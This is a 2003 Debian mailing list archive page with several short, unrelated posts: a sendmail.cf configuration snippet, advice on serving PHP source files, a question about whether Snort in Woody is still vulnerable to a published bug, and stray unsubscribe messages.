
This is were the trouble starts in the sendmail.cf:

# handle null input (translate to <@> special case)
R$@ $@ <@>

# strip group: syntax (not inside angle brackets!) and trailing semicolon



grtz  Miek


--
:wq!


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Why PHP is parsing not only .php

2003-04-04 Thread François TOURDE 
Chris Francy <[EMAIL PROTECTED]> writes:

> You should probably be using the phps extension with the 
> AddType application/x-httpd-php-source .phps instead of renameing them
> to have a .txt extension.
> 

That's exactly what I do, using a symlink. So my progs are available as
progs and as source files.

But you can symlink to a .txt file too, removing any other extensions.

-- 
AMAZING BUT TRUE ...
If all the salmon caught in Canada in one year were laid end to end
across the Sahara Desert, the smell would be absolutely awful.
-- 
François TOURDE - tourde.org - 23 rue Bernard GANTE - 93250 VILLEMOMBLE
Tél: 01 49 35 96 69 - Mob: 06 81 01 81 80
eMail: mailto:[EMAIL PROTECTED] - URL: http://francois.tourde.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

RE: SANS Alert - Snort Vulnerability - stil Vulnerabile ?

2003-04-04 Thread Przemysław Świderski 

> 
> On Tue, Mar 11, 2003 at 06:53:48PM +0900, Hideki Yamane wrote:
> > 
> > >This was added to the SANS Advisory on Sendmail last week.
> > >I have not seen any news nor postings related to Snort with
> > >Debian and was wondering about the status of Snort in stable
> > >at this time.  
> > 
> >  snort vulnerability was posted in BTS.
> >  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=183719
> > 
> >  # but, yes, DSA have not been released yet.
> 
Is Woody version stil Vulnerabile to this serious security bug ?

-- 
Przemek


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

unsubscribe

2003-04-04 Thread Бейко Юрий Викторович 








 

unsubscribe

2003-04-04 Thread Бейко Юрий Викторович